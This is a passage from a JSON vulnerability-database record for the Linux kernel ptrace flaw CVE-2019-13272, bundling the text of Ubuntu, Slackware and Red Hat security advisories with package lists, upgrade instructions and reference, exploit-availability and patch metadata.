for connectionless networking\nprotocols. A remote attacker could use this to track particular Linux\ndevices. (CVE-2019-10638)\n\nIt was discovered that a NULL pointer dereference vulnerability existed in\nthe Near-field communication (NFC) implementation in the Linux kernel. A\nlocal attacker could use this to cause a denial of service (system crash). \n(CVE-2019-12984)\n\nJann Horn discovered a use-after-free vulnerability in the Linux kernel\nwhen accessing LDT entries in some situations. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2019-13233)\n\nJann Horn discovered that the ptrace implementation in the Linux kernel did\nnot properly record credentials in some situations. A local attacker could\nuse this to cause a denial of service (system crash) or possibly gain\nadministrative privileges. (CVE-2019-13272)\n\nIt was discovered that the floppy driver in the Linux kernel did not\nproperly validate meta data, leading to a buffer overread. A local attacker\ncould use this to cause a denial of service (system crash). \n(CVE-2019-14283)\n\nIt was discovered that the floppy driver in the Linux kernel did not\nproperly validate ioctl() calls, leading to a division-by-zero. A local\nattacker could use this to cause a denial of service (system crash). \n(CVE-2019-14284)\n\nIt was discovered that the Marvell Wireless LAN device driver in the Linux\nkernel did not properly validate the BSS descriptor. A local attacker could\npossibly use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2019-3846)\n\nJason Wang discovered that an infinite loop vulnerability existed in the\nvirtio net driver in the Linux kernel. A local attacker in a guest VM could\npossibly use this to cause a denial of service in the host system. \n(CVE-2019-3900)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 19.04:\n  linux-image-5.0.0-1014-aws      5.0.0-1014.16\n  linux-image-aws                 5.0.0.1014.15\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n  https://usn.ubuntu.com/4117-1\n  CVE-2019-10126, CVE-2019-10638, CVE-2019-12984, CVE-2019-13233,\n  CVE-2019-13272, CVE-2019-14283, CVE-2019-14284, CVE-2019-3846,\n  CVE-2019-3900\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/linux-aws/5.0.0-1014.16\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n[slackware-security]  Slackware 14.2 kernel (SSA:2019-202-01)\n\nNew kernel packages are available for Slackware 14.2 to fix security issues. \n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n+--------------------------+\npatches/packages/linux-4.4.182/*:  Upgraded. \n  These updates fix various bugs and many minor security issues. \n  Be sure to upgrade your initrd after upgrading the kernel packages. \n  If you use lilo to boot your machine, be sure lilo.conf points to the correct\n  kernel and initrd and run lilo as root to update the bootloader. \n  If you use elilo to boot your machine, you should run eliloconfig to copy the\n  kernel and initrd to the EFI System Partition. \n  For more information, see:\n    Fixed in 4.4.183:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11599\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3892\n    Fixed in 4.4.185:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13272\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16597\n    Fixed in 4.4.186:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10126\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3846\n  (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project!  :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.186/kernel-firmware-20190717_bf13a71-noarch-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.186/kernel-generic-4.4.186-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.186/kernel-generic-smp-4.4.186_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.186/kernel-headers-4.4.186_smp-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.186/kernel-huge-4.4.186-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.186/kernel-huge-smp-4.4.186_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.186/kernel-modules-4.4.186-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.186/kernel-modules-smp-4.4.186_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.186/kernel-source-4.4.186_smp-noarch-1.txz\n\nUpdated packages for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware66-14.2/patches/packages/linux-4.4.186/kernel-firmware-20190717_bf13a71-noarch-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware66-14.2/patches/packages/linux-4.4.186/kernel-generic-4.4.186-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware66-14.2/patches/packages/linux-4.4.186/kernel-headers-4.4.186-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware66-14.2/patches/packages/linux-4.4.186/kernel-huge-4.4.186-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware66-14.2/patches/packages/linux-4.4.186/kernel-modules-4.4.186-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware66-14.2/patches/packages/linux-4.4.186/kernel-source-4.4.186-noarch-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.2 packages:\n01138ebc336b6e6d692697570bb32920  kernel-firmware-20190717_bf13a71-noarch-1.txz\nd7e0b9ffdc4265b45d4de39d49d52616  kernel-generic-4.4.186-i586-1.txz\nc1131f8dd16f7113cc8b1e14c402a9b7  kernel-generic-smp-4.4.186_smp-i686-1.txz\nca4630c4ee7056c51f3262152bfb9213  kernel-headers-4.4.186_smp-x86-1.txz\n61b95e68756fe9741ddbdc52f397fe49  kernel-huge-4.4.186-i586-1.txz\nff981138513726a502d57f9e2aecad36  kernel-huge-smp-4.4.186_smp-i686-1.txz\nca8f6fb5fc378d16e5afcee31dd032dc  kernel-modules-4.4.186-i586-1.txz\n25fc2f1280f1a706705ef4535f4efd1c  kernel-modules-smp-4.4.186_smp-i686-1.txz\n2d299723d6f910df1e8c21d18070b9ef  kernel-source-4.4.186_smp-noarch-1.txz\n\n\nSlackware x86_64 14.2 packages:\n01138ebc336b6e6d692697570bb32920  kernel-firmware-20190717_bf13a71-noarch-1.txz\n80caffb238022225afe93b957fecbff2  kernel-generic-4.4.186-x86_64-1.txz\nf72e4543e3489d18604f33a901e04551  kernel-headers-4.4.186-x86-1.txz\n0765db332a94cfedcacd987871903e56  kernel-huge-4.4.186-x86_64-1.txz\n8d565a7b223b9444731796e6147116eb  kernel-modules-4.4.186-x86_64-1.txz\n0254fdbb4430362ea373b47584d8eb30  kernel-source-4.4.186-noarch-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg kernel-*.txz\n\nIf you are using an initrd, you\u0027ll need to rebuild it. \n\nFor a 32-bit SMP machine, use this command (substitute the appropriate\nkernel version if you are not running Slackware 14.2):\n# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.186-smp | bash\n\nFor a 64-bit machine, or a 32-bit uniprocessor machine, use this command\n(substitute the appropriate kernel version if you are not running\nSlackware 14.2):\n# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.186 | bash\n\nPlease note that \"uniprocessor\" has to do with the kernel you are running,\nnot with the CPU. Most systems should run the SMP kernel (if they can)\nregardless of the number of cores the CPU has. If you aren\u0027t sure which\nkernel you are running, run \"uname -a\". If you see SMP there, you are\nrunning the SMP kernel and should use the 4.4.186-smp version when running\nmkinitrd_command_generator. Note that this is only for 32-bit -- 64-bit\nsystems should always use 4.4.186 as the version. \n\nIf you are using lilo or elilo to boot the machine, you\u0027ll need to ensure\nthat the machine is properly prepared before rebooting. \n\nIf using LILO:\nBy default, lilo.conf contains an image= line that references a symlink\nthat always points to the correct kernel. No editing should be required\nunless your machine uses a custom lilo.conf. If that is the case, be sure\nthat the image= line references the correct kernel file.  Either way,\nyou\u0027ll need to run \"lilo\" as root to reinstall the boot loader. \n\nIf using elilo:\nEnsure that the /boot/vmlinuz symlink is pointing to the kernel you wish\nto use, and then run eliloconfig to update the EFI System Partition. \n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list:                          |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message:                                                     |\n|                                                                        |\n|   unsubscribe slackware-security                                       |\n|                                                                        |\n| You will get a confirmation message back containing instructions to    |\n| complete the process.  Please do not reply to this email address. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Important: kernel-alt security, bug fix, and enhancement update\nAdvisory ID:       RHSA-2019:2809-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2019:2809\nIssue date:        2019-09-20\nCVE Names:         CVE-2019-5489 CVE-2019-6974 CVE-2019-13272\n====================================================================\n1. Summary:\n\nAn update for kernel-alt is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7) - aarch64, noarch, ppc64le, s390x\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7) - aarch64, noarch, ppc64le\n\n3. Description:\n\nThe kernel-alt packages provide the Linux kernel version 4.x. \n\nSecurity Fix(es):\n\n* Kernel: page cache side channel attacks (CVE-2019-5489)\n\n* Kernel: KVM: potential use-after-free via kvm_ioctl_create_device()\n(CVE-2019-6974)\n\n* kernel: broken permission and object lifetime handling for PTRACE_TRACEME\n(CVE-2019-13272)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* [kernel-alt]: BUG: unable to handle kernel NULL pointer IP:\ncrypto_remove_spawns+0x118/0x2e0 (BZ#1536967)\n\n* [HPE Apache] update ssif max_xmit_msg_size limit for multi-part messages\n(BZ#1610534)\n\n* RHEL-Alt-7.6 - powerpc/pseries: Fix unitialized timer reset on migration\n/ powerpc/pseries/mobility: Extend start/stop topology update scope (LPM)\n(BZ#1673613)\n\n* RHEL-Alt-7.6 - s390: sha3_generic module fails and triggers panic when in\nFIPS mode (BZ#1673979)\n\n* RHEL-Alt-7.6 - System crashed after oom - During ICP deployment\n(BZ#1710304)\n\n* kernel-alt: Race condition in hashtables [rhel-alt-7.6.z] (BZ#1712127)\n\n* RHEL-Alt-7.6 - OP930:PM_Test:cpupower -r command set values for first 3\ncores in quad and misses last core. (CORAL) (BZ#1717836)\n\n* RHEL-Alt-7.6 - disable runtime NUMA remapping for PRRN/LPM/VPHN\n(BZ#1717906)\n\n* fragmented packets timing out (BZ#1729066)\n\n* Backport TCP follow-up for small buffers (BZ#1733617)\n\nEnhancement(s):\n\n* RHEL-Alt-7.6 - perfevent PMDA cannot create file descriptors for reading\nnest events using the perf API (pcp/kernel) (CORAL) (BZ#1723036)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1664110 - CVE-2019-5489 Kernel: page cache side channel attacks\n1671913 - CVE-2019-6974 Kernel: KVM: potential use-after-free via kvm_ioctl_create_device()\n1730895 - CVE-2019-13272 kernel: broken permission and object lifetime handling for PTRACE_TRACEME\n\n6. Package List:\n\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7):\n\nSource:\nkernel-alt-4.14.0-115.12.1.el7a.src.rpm\n\naarch64:\nkernel-4.14.0-115.12.1.el7a.aarch64.rpm\nkernel-debug-4.14.0-115.12.1.el7a.aarch64.rpm\nkernel-debug-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm\nkernel-debug-devel-4.14.0-115.12.1.el7a.aarch64.rpm\nkernel-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.14.0-115.12.1.el7a.aarch64.rpm\nkernel-devel-4.14.0-115.12.1.el7a.aarch64.rpm\nkernel-headers-4.14.0-115.12.1.el7a.aarch64.rpm\nkernel-tools-4.14.0-115.12.1.el7a.aarch64.rpm\nkernel-tools-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm\nkernel-tools-libs-4.14.0-115.12.1.el7a.aarch64.rpm\nperf-4.14.0-115.12.1.el7a.aarch64.rpm\nperf-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm\npython-perf-4.14.0-115.12.1.el7a.aarch64.rpm\npython-perf-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm\n\nnoarch:\nkernel-abi-whitelists-4.14.0-115.12.1.el7a.noarch.rpm\nkernel-doc-4.14.0-115.12.1.el7a.noarch.rpm\n\nppc64le:\nkernel-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-bootwrapper-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-debug-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-debug-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-devel-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-headers-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-tools-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-tools-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-tools-libs-4.14.0-115.12.1.el7a.ppc64le.rpm\nperf-4.14.0-115.12.1.el7a.ppc64le.rpm\nperf-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm\npython-perf-4.14.0-115.12.1.el7a.ppc64le.rpm\npython-perf-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm\n\ns390x:\nkernel-4.14.0-115.12.1.el7a.s390x.rpm\nkernel-debug-4.14.0-115.12.1.el7a.s390x.rpm\nkernel-debug-debuginfo-4.14.0-115.12.1.el7a.s390x.rpm\nkernel-debug-devel-4.14.0-115.12.1.el7a.s390x.rpm\nkernel-debuginfo-4.14.0-115.12.1.el7a.s390x.rpm\nkernel-debuginfo-common-s390x-4.14.0-115.12.1.el7a.s390x.rpm\nkernel-devel-4.14.0-115.12.1.el7a.s390x.rpm\nkernel-headers-4.14.0-115.12.1.el7a.s390x.rpm\nkernel-kdump-4.14.0-115.12.1.el7a.s390x.rpm\nkernel-kdump-debuginfo-4.14.0-115.12.1.el7a.s390x.rpm\nkernel-kdump-devel-4.14.0-115.12.1.el7a.s390x.rpm\nperf-4.14.0-115.12.1.el7a.s390x.rpm\nperf-debuginfo-4.14.0-115.12.1.el7a.s390x.rpm\npython-perf-4.14.0-115.12.1.el7a.s390x.rpm\npython-perf-debuginfo-4.14.0-115.12.1.el7a.s390x.rpm\n\nRed Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7):\n\naarch64:\nkernel-debug-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm\nkernel-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm\nkernel-debuginfo-common-aarch64-4.14.0-115.12.1.el7a.aarch64.rpm\nkernel-tools-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm\nkernel-tools-libs-devel-4.14.0-115.12.1.el7a.aarch64.rpm\nperf-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm\npython-perf-debuginfo-4.14.0-115.12.1.el7a.aarch64.rpm\n\nnoarch:\nkernel-doc-4.14.0-115.12.1.el7a.noarch.rpm\n\nppc64le:\nkernel-debug-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-debug-devel-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-tools-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm\nkernel-tools-libs-devel-4.14.0-115.12.1.el7a.ppc64le.rpm\nperf-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm\npython-perf-debuginfo-4.14.0-115.12.1.el7a.ppc64le.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2019 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXYS+G9zjgjWX9erEAQgWLQ/9E1IoTs6bpakJ6GIPIMJUeYDCRpXLRrHt\nCAdDGt7wQ2l5PUY2R98fiCs266c8Vaiqll6PDbFRDwHEI4gSkYnemdC3pdD/u1ct\nKEch6TBhUejC52t/Zvq2hrUItEj1oz35mVTv+cHHfX9HqVTdV+1SeOR+WoETy+I4\nqdBKOSPybxtisp9fdczX0F3uzAfpHqCFVZ2OSvPJmDCZU20gjF+1h+HiyvS4iWT1\nqrlMFQ1EliSMbjO/pCTj6PHIcOUNPg7tkx72s5E0qRd4Ja10nZ7QNUh8VGGHNQxb\nUYLfM7GojPgWx2UzjLo6EU5a9/Xuo6rwgTE5hKWGqZCm645RSv71tpTbdZJe6vnS\ncyzGIV7NtIvMF625LvimVBB/BSXZK3vYpSuBtcPnvKg2wAet83fIzQ4PtwBpzP7p\nNfFLvedXg2CRZIYbi5u6tzCqE2UKDpfvKWry8MyELDpt4b4iZEbHt0S4ZdfKzOvu\najvY2VuM414x0FZpWCEHFXT7dbcilf2ZBg0g0UgazRhumm9utfBsbmQz0fS7GcML\nEf3YRj97YJPhGoeAQ8b+ox8Z+Q/J+/39smr94scd9FjhotlQgVh9zmd6c4IzisEE\niwtg6J38bOHzXi9q3x3Fw4FTe6kUQHeOw9703w/EqojumKVCVCX6VoZ0tmAt720O\nItDqWovzGmk=yv43\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-13272"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-006727"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-13272"
      },
      {
        "db": "PACKETSTORM",
        "id": "154044"
      },
      {
        "db": "PACKETSTORM",
        "id": "153972"
      },
      {
        "db": "PACKETSTORM",
        "id": "154045"
      },
      {
        "db": "PACKETSTORM",
        "id": "153699"
      },
      {
        "db": "PACKETSTORM",
        "id": "153970"
      },
      {
        "db": "PACKETSTORM",
        "id": "154316"
      },
      {
        "db": "PACKETSTORM",
        "id": "153702"
      },
      {
        "db": "PACKETSTORM",
        "id": "154553"
      }
    ],
    "trust": 2.43
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=47133",
        "trust": 0.3,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-13272"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-13272",
        "trust": 3.3
      },
      {
        "db": "PACKETSTORM",
        "id": "153702",
        "trust": 1.7
      },
      {
        "db": "PACKETSTORM",
        "id": "153663",
        "trust": 1.6
      },
      {
        "db": "PACKETSTORM",
        "id": "156929",
        "trust": 1.6
      },
      {
        "db": "PACKETSTORM",
        "id": "154957",
        "trust": 1.6
      },
      {
        "db": "PACKETSTORM",
        "id": "165051",
        "trust": 1.6
      },
      {
        "db": "PACKETSTORM",
        "id": "154245",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-006727",
        "trust": 0.8
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4646",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2704",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4346",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4252",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2749",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4346.2",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "50541",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "47163",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "47133",
        "trust": 0.6
      },
      {
        "db": "LENOVO",
        "id": "LEN-29592",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201907-809",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-13272",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154044",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153972",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154045",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153699",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153970",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154316",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154553",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-13272"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-006727"
      },
      {
        "db": "PACKETSTORM",
        "id": "154044"
      },
      {
        "db": "PACKETSTORM",
        "id": "153972"
      },
      {
        "db": "PACKETSTORM",
        "id": "154045"
      },
      {
        "db": "PACKETSTORM",
        "id": "153699"
      },
      {
        "db": "PACKETSTORM",
        "id": "153970"
      },
      {
        "db": "PACKETSTORM",
        "id": "154316"
      },
      {
        "db": "PACKETSTORM",
        "id": "153702"
      },
      {
        "db": "PACKETSTORM",
        "id": "154553"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201907-809"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-13272"
      }
    ]
  },
  "id": "VAR-201907-1641",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.25113124
  },
  "last_update_date": "2024-07-23T21:13:51.034000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "ChangeLog-5.1.17",
        "trust": 0.8,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/changelog-5.1.17"
      },
      {
        "title": "[SECURITY] [DLA 1862-1] linux security update",
        "trust": 0.8,
        "url": "https://lists.debian.org/debian-lts-announce/2019/07/msg00022.html"
      },
      {
        "title": "[SECURITY] [DLA 1863-1] linux-4.9 security update",
        "trust": 0.8,
        "url": "https://lists.debian.org/debian-lts-announce/2019/07/msg00023.html"
      },
      {
        "title": "DSA-4484",
        "trust": 0.8,
        "url": "https://www.debian.org/security/2019/dsa-4484"
      },
      {
        "title": "FEDORA-2019-a95015e60f",
        "trust": 0.8,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ogrk5lywbj4e4sri4dkx367nhysi3voh/"
      },
      {
        "title": "ptrace: Fix -\u003eptracer_cred handling for PTRACE_TRACEME",
        "trust": 0.8,
        "url": "https://github.com/torvalds/linux/commit/6994eefb0053799d2e07cd140df6c2ea106c41ee"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org"
      },
      {
        "title": "ptrace: Fix -\u003eptracer_cred handling for PTRACE_TRACEME",
        "trust": 0.8,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6994eefb0053799d2e07cd140df6c2ea106c41ee"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20192411 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel-rt security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20192405 - security advisory"
      },
      {
        "title": "Debian Security Advisories: DSA-4484-1 linux -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=f7aec913c227117e479ebfa6af2b1b9a"
      },
      {
        "title": "Red Hat: CVE-2019-13272",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2019-13272"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-hwe, linux-azure, linux-gcp, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4093-1"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4095-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-aws vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4117-1"
      },
      {
        "title": "IBM: IBM Security Bulletin: Linux Kernel vulnerabilities affect IBM Spectrum Protect Plus CVE-2019-10140, CVE-2019-11477, CVE-2019-11478, CVE-2019-11479, CVE-2019-13233, CVE-2019-13272, CVE-2019-14283, CVE-2019-14284, CVE-2019-15090, CVE-2019-15807, CVE-2019-15925",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=d9cd8f6d11c68af77f2f2bd27ca37bed"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-hwe, linux-azure, linux-gcp, linux-gke-4.15, linux-kvm, linux-oem, linux-oracle, linux-raspi2, linux-snapdragon vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4094-1"
      },
      {
        "title": "IBM: Security Bulletin: Multiple vulnerabilities affect IBM Cloud Object Storage Systems (March 2021)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=afc44ca312a83d419e062241c4789aae"
      },
      {
        "title": "Ubuntu Security Notice: linux-aws vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4118-1"
      },
      {
        "title": "Siemens Security Advisories: Siemens Security Advisory",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=ec6577109e640dac19a6ddb978afe82d"
      },
      {
        "title": "CVE-2019-13272 - Pkexec Local Privilege Escalation",
        "trust": 0.1,
        "url": "https://github.com/asepsaepdin/cve-2019-13272 "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-13272"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-006727"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-269",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-264",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
